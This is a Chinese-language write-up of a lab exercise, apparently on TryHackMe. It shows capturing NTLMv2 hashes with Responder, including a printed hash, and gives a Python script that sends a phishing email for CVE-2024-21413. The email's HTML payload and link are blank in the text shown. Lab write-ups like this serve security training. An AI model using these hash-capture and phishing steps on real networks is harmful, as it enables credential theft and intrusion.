演示通过 Responder 捕获 NTLM 哈希,并执行利用 CVE-2024-21413 的网络钓鱼电子邮件以入侵系统。
项目目标: 该项目旨在演示如何使用各种工具在网络上捕获用户的NTLM哈希值,以及通过电子邮件执行钓鱼攻击。这展示了如何利用网络身份验证漏洞和钓鱼方法来入侵系统。
过程描述
我运行了以下命令来启动Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
我将Responder配置为在ens5接口上监听。它立即开始拦截身份验证请求,使我能够查看网络上用户的NTLM哈希值,例如THM-MONIKERLINK\tryhackme和WORKGROUP\Administrator。以下是捕获哈希值时输出的样子:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
然后,这些哈希值可以用于暴力破解或哈希攻击等攻击。
邮件中的钓鱼链接如下所示:
以下是用于发送钓鱼邮件的完整Python脚本:import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
该脚本发送一封带有恶意链接的邮件,该链接可能利用CVE-2024-21413漏洞。
结果 作为结果,我能够演示两个关键方面:
使用Responder工具捕获NTLM哈希值,这是攻击网络身份验证的关键步骤。
通过Python脚本利用电子邮件进行钓鱼和漏洞利用。发送带有恶意链接的钓鱼邮件可以欺骗用户,并导致系统入侵。
该项目展示了如何利用网络漏洞和钓鱼攻击来获取系统访问权限。同时,也强调了通过强身份验证方法和电子邮件流量过滤来防御此类攻击的重要性。